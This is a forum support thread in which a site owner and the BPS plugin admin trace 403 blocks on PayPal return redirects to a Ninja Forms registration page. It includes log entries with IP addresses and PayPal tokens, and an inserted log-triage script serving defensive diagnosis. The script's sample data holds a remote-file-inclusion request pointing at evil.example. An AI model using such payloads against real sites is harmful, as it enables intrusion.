Ninja Forms – 403 error

This topic contains 24 replies, has 2 voices, and was last updated by  Rob B 7 months, 1 week ago.

Viewing 15 posts - 1 through 15 (of 25 total)
  • #36916

    Rob B
    Participant

    Website is using Ninja Forms with PayPal Express.  Most purchases go through but when an error occurs then the person is blocked from the website.

    [403 GET Request: March 2, 2019 3:24 am]
    BPS: 3.3
    WP: 5.0.3
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 47.xx.xx.xx
    Host Name: 047-024-192-055.res.spectrum.com
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER: https://www.paypal.com/webscr?cmd=_express-checkout&token=EC-9xxxxxxxxxxxxxT&useraction=commit
    REQUEST_URI: /art/art-in-the-park-artist-registration-apr-13-2019/?nf_resume=55&nfpe_checkout=success&token=EC-9T124165M1687513T&PayerID=G5GG5RGDMVXAN
    QUERY_STRING: nf_resume=55&nfpe_checkout=success&token=EC-9T124165M1687513T&PayerID=G5GG5RGDMVXAN
    HTTP_USER_AGENT: Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG-SM-G935A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.105 Mobile Safari/537.36
    #36919

    AITpro Admin
    Keymaster

    The way BPS security features/rules work is that if BPS is blocking something then it will always block whatever is being blocked consistently until a fix/solution is created.  BPS does not intermittently block things because that is not how the security rules work.  In other words, it is an “all or nothing” thing.  So either the problem is occurring because of things that do cause intermittent problems > php memory/cache/caching plugins/CDNs/VPNs/Proxies/Load Balancers/Host server problems (new security measures added on Host server (Mod Security, etc.), DNS server/DNS configuration problem, MySQL server timeout, server overloaded, etc.), /Browser problems (corrupt cache, Sessions, Cookies, add-on, extension)/ISP (connectivity)/CloudFlare, Incapsula, etc.  Or what appears to be a failed/blocked purchase is not really a failed/blocked purchase.  Or the problem is specific to mobile devices > The 403 error shows that the User Agent is a mobile device (Linux; Android 8.0.0; SAMSUNG-SM-G935A).  Or you have Mod Security enabled in your web host control panel and Mod Security is blocking mobile devices and BPS Security Logging is logging that Mod Security 403 error.  Or of course this could be a bot or spammer/hacker that should be blocked and not a failed transaction/purchase.

    Post a link/URL to your website so I can run some tests using a mobile device to see if the problem is isolated to mobile devices.

    #36922

    AITpro Admin
    Keymaster

    The static IP address:  47.24.192.55 in the Security Log entry is for a website on Spectrum ISP.  That is a bit odd since the User Agent shows that the Request was made by a Mobile Device.  Is the IP address your website IP address on Spectrum?

    #36923

    Rob B
    Participant

    URL to website

    https://steelvilleartscouncil.org/art/

    Their ISP is on Spectrum and they tried a desktop then went to their phone to try to fill out the form.

    The phone was using the Spectrum WiFi

    They were a legitimate user.  They filled out a registration form that required payment from PayPal.  PayPal showed an error (unknown what error), then when they were directed back to the site they were blocked.

    This has happened 3 or 4 times in the last 2 months.  Just now was able to get someone to walk me through their actions and resulting errors.  So I know the errors are the ones for this particular user.

    Below is the log file that is associated with the user.

    [403 GET Request: March 2, 2019 3:24 am]
    BPS: 3.3
    WP: 5.0.3
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 47.24.192.55
    Host Name: 047-024-192-055.res.spectrum.com
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER: https://www.paypal.com/webscr?cmd=_express-checkout&token=EC-9xxxxxxxxxxxxxT&useraction=commit
    REQUEST_URI: /art/art-in-the-park-artist-registration-apr-13-2019/?nf_resume=55&nfpe_checkout=success&token=EC-9T124165M1687513T&PayerID=G5GG5RGDMVXAN
    QUERY_STRING: nf_resume=55&nfpe_checkout=success&token=EC-9T124165M1687513T&PayerID=G5GG5RGDMVXAN
    HTTP_USER_AGENT: Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG-SM-G935A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.105 Mobile Safari/537.36
    
    [403 GET Request: March 2, 2019 3:26 am]
    BPS: 3.3
    WP: 5.0.3
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 47.24.192.55
    Host Name: 047-024-192-055.res.spectrum.com
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /art/
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG-SM-G935A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.105 Mobile Safari/537.36
    
    [403 GET Request: March 2, 2019 3:26 am]
    BPS: 3.3
    WP: 5.0.3
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 47.24.192.55
    Host Name: 047-024-192-055.res.spectrum.com
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /art/
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG-SM-G935A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.105 Mobile Safari/537.36
    
    [403 GET Request: March 2, 2019 3:27 am]
    BPS: 3.3
    WP: 5.0.3
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 47.24.192.55
    Host Name: 047-024-192-055.res.spectrum.com
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER: https://www.google.com/
    REQUEST_URI: /art/category/events/
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG-SM-G935A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.105 Mobile Safari/537.36
    
    [403 GET Request: March 2, 2019 3:27 am]
    BPS: 3.3
    WP: 5.0.3
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 47.24.192.55
    Host Name: 047-024-192-055.res.spectrum.com
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER: https://www.google.com/
    REQUEST_URI: /art/for-artists/call-for-artists/
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG-SM-G935A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.105 Mobile Safari/537.36
    #36924

    Rob B
    Participant

    Would this rule help?

    # Example 3: Whitelist PayPal IPN API Script POST Requests
    RewriteCond %{REQUEST_URI} !^.*/ipn_handler.php [NC]
    RewriteRule ^(.*)$ - [F]
    #36925

    AITpro Admin
    Keymaster

    That rule would only work if the exact specific name of your IPN handler file/script was that exact file name.  If some payment transactions are going through then it is not a problem with whitelisting a particular file.  BPS works in a way that is “all or nothing”.  ie all PayPal transactions would fail or be blocked or none of them would be.  There is no in-between since that is not the way BPS is designed or the way htaccess security rules work.  Static htaccess security rules do not work intermittently since they are rules that your server uses to process things.  They either consistently block something 100% of the time or not at all.  So you have some sort of intermittent problem that must be caused by some other problem.  My gut is telling me that when an error occurs on PayPal and the user is sent back to your website then something in the redirect from PayPal back to your website triggers a 403 error.  It would be nice to know what that PayPal error is.  I am checking/testing your site now and will let you know if I find anything.

    #36926

    Rob B
    Participant

    I agree with your gut feeling.

    My gut is telling me that when an error occurs on PayPal and the user is sent back to your website then something in the redirect from PayPal back to your website triggers a 403 error.

    The user reported that the 403 started after the PayPal error.  I am guessing they got a redirect that triggered the issue.

    #36927

    AITpro Admin
    Keymaster

    I was able to successfully reproduce the problem by filling out your Registration form and cancelling the PayPal transaction.  So now I am analyzing why the PayPal redirect back to your site is causing the 403 error.  Will post a reply when I have figured that out.

    #36928

    Rob B
    Participant

    Could not see the error in PayPal as the transaction was not recorded.

    #36929

    Rob B
    Participant

    Is this your entry?

    [403 GET Request: March 4, 2019 7:55 pm]
    BPS: 3.3
    WP: 5.1
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 108.213.94.121
    Host Name: 108-213-94-121.lightspeed.irvnca.sbcglobal.net
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER: https://www.paypal.com/webscr?cmd=_express-checkout&token=EC-4VL960529M7110255&useraction=commit
    REQUEST_URI: /art/art-in-the-park-artist-registration-apr-13-2019/?nf_resume=55&nfpe_checkout=cancel&token=EC-4VL960529M7110255&country.x=US&locale.x=en_US
    QUERY_STRING: nf_resume=55&nfpe_checkout=cancel&token=EC-4VL960529M7110255&country.x=US&locale.x=en_US
    HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
    #36930

    AITpro Admin
    Keymaster

    Ok so here is where we are at > there is nothing in the Query String of the post back to your website that BPS would block.  So what I need you to do now is to login to PayPal and find your “Take customers to this URL when they cancel their checkout” settings and then post the URL that you see.  I suspect you may be trying to do some sort of odd redirect that is causing the 403 error because the redirect is seen as an RFI hacking attempt.  I could be wrong, but that is the first possibility to eliminate.  The other possibilities are that you are doing some sort of forwarding or redirects somewhere else that are causing the URL to be redirected more than once.

    #36931

    AITpro Admin
    Keymaster

    Yes, that was the test PayPal transaction that I did. The Security Log entry does not really tell you what the root problem is because the problem is happening outside of your website or some odd control panel setting or some fubar htaccess redirect code or your PayPal settings are fubar.

    #36932

    Rob B
    Participant

    Return URL:

    https://steelvilleartscouncil.org/art/thank-you-for-your-purchase/

    So nothing there, also this is for successful payments.

    Looking more.

    #36933

    AITpro Admin
    Keymaster

    Please post the PayPal URL for failed or cancelled transactions. The BPS 403 error is “after the fact” since the problem is occurring during the redirect back from PayPal on errors or failed transactions. Successful PayPal transactions appear to be fine. So yeah that is where you need to start troubleshooting this PayPal settings problem. My guess is that you have some sort of RFI URL redirect issue going on.
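
A triage script for the BPS Security Log entries quoted in this thread, added here as an illustration and not code from BPS or from either participant: it parses the [403 GET Request: ...] blocks, records whether a blocked request arrived from a paypal.com referer, and flags query parameters whose value is an absolute URL, the shape a generic .htaccess RFI filter rejects. The regex, the sample entries, the addresses and the token are constructed assumptions, not BPS's actual rule or real log data; it serves the RFI hypothesis raised in #36930 and restated in #36933.

```python
import re
from urllib.parse import parse_qsl, urlparse

# Constructed sample in the BPS Security Log layout quoted in this thread (placeholder values).
SAMPLE_LOG = """[403 GET Request: March 4, 2019 7:55 pm]
Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
REMOTE_ADDR: 203.0.113.10
HTTP_REFERER: https://www.paypal.com/webscr?cmd=_express-checkout&token=EC-EXAMPLE&useraction=commit
REQUEST_URI: /art/registration/?nf_resume=55&nfpe_checkout=cancel&token=EC-EXAMPLE&country.x=US
QUERY_STRING: nf_resume=55&nfpe_checkout=cancel&token=EC-EXAMPLE&country.x=US

[403 GET Request: March 4, 2019 7:56 pm]
Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
REMOTE_ADDR: 198.51.100.7
HTTP_REFERER:
REQUEST_URI: /art/?page=http://evil.example/inc.txt
QUERY_STRING: page=http://evil.example/inc.txt
"""

ENTRY_RE = re.compile(r"^\[(\d{3}) (\w+) Request: (.+?)\]$")
# Heuristic for "parameter value is an absolute URL" (assumption: not BPS's own rule).
URL_VALUE_RE = re.compile(r"^(?:https?|ftp):|^//", re.IGNORECASE)

def parse_bps_log(text):
    """One dict per '[NNN METHOD Request: time]' block; 'Key: value' lines become keys."""
    entries, current = [], None
    for raw in text.splitlines():
        m = ENTRY_RE.match(raw.strip())
        if m:
            current = {"status": int(m.group(1)), "method": m.group(2), "time": m.group(3)}
            entries.append(current)
        elif current is not None and ":" in raw:
            key, _, value = raw.partition(":")
            current[key.strip()] = value.strip()
    return entries

def url_like_params(query_string):
    """Names of query parameters whose value looks like an absolute URL (RFI shape)."""
    return [k for k, v in parse_qsl(query_string, keep_blank_values=True)
            if URL_VALUE_RE.search(v)]

def came_from_paypal(entry):
    """True when the referer host is paypal.com or a subdomain of it."""
    host = urlparse(entry.get("HTTP_REFERER", "")).hostname or ""
    return host == "paypal.com" or host.endswith(".paypal.com")

def triage(text):
    """Per entry: (time, remote address, arrived from PayPal?, RFI-looking parameters)."""
    return [(e["time"], e.get("REMOTE_ADDR"), came_from_paypal(e),
             url_like_params(e.get("QUERY_STRING", ""))) for e in parse_bps_log(text)]
```

For the PayPal cancel return in the first sample entry the script reports no URL-valued parameter, which matches the admin's reading that nothing in that query string should trip BPS; only the second, constructed entry is flagged.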

    #36934

    Rob B
    Participant

    Yes we are on the same page.

    I will be looking for the failed transaction redirect.
